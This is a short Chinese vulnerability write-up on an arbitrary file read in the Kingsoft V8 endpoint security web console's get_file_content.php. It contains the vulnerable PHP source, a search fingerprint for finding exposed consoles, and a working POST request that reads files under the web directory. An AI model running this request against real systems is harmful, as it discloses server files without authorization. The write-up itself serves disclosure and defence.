# 金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞

# 漏洞描述

金山 V8 终端安全系统存在任意文件读取漏洞，攻击者可以通过漏洞下载服务器任意文件

# 漏洞影响

金山 V8 终端安全系统

# 网络测绘

title="在线安装-V8+终端安全系统Web控制台"

# 漏洞复现

登录页面

存在漏洞的文件/Console/receive_file/get_file_content.php

<?php  
  if(stripos($_POST['filepath'],"..") !== false) {
    echo 'no file founggd';
    exit();
  }
  ini_set("open_basedir", "../");
  $file_path = '../'.iconv("utf-8","gb2312",$_POST['filepath']);
  if(!file_exists($file_path)){
    echo 'no file founggd';
    exit();
  }  

  $fp=fopen($file_path,"r");  
  $file_size=filesize($file_path); 

  $buffer=5024;  
  $file_count=0;  

  while(!feof($fp) && $file_count<$file_size){  
    $file_con=fread($fp,$buffer);  
    $file_count+=$buffer;  
    echo $file_con;  
  }  
  fclose($fp);  
?>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

文件中没有任何的过滤通过 filepaht 参数即可下载任意文件

由于不能出现 .. ，所以只能读取web目录下的文件

POST /receive_file/get_file_content.php

filepath=login.php

1
2
3

#

亿邮电子邮件系统 moni_detail.do 远程命令执行漏洞金山 V8 终端安全系统 downfile.php 任意文件读取漏洞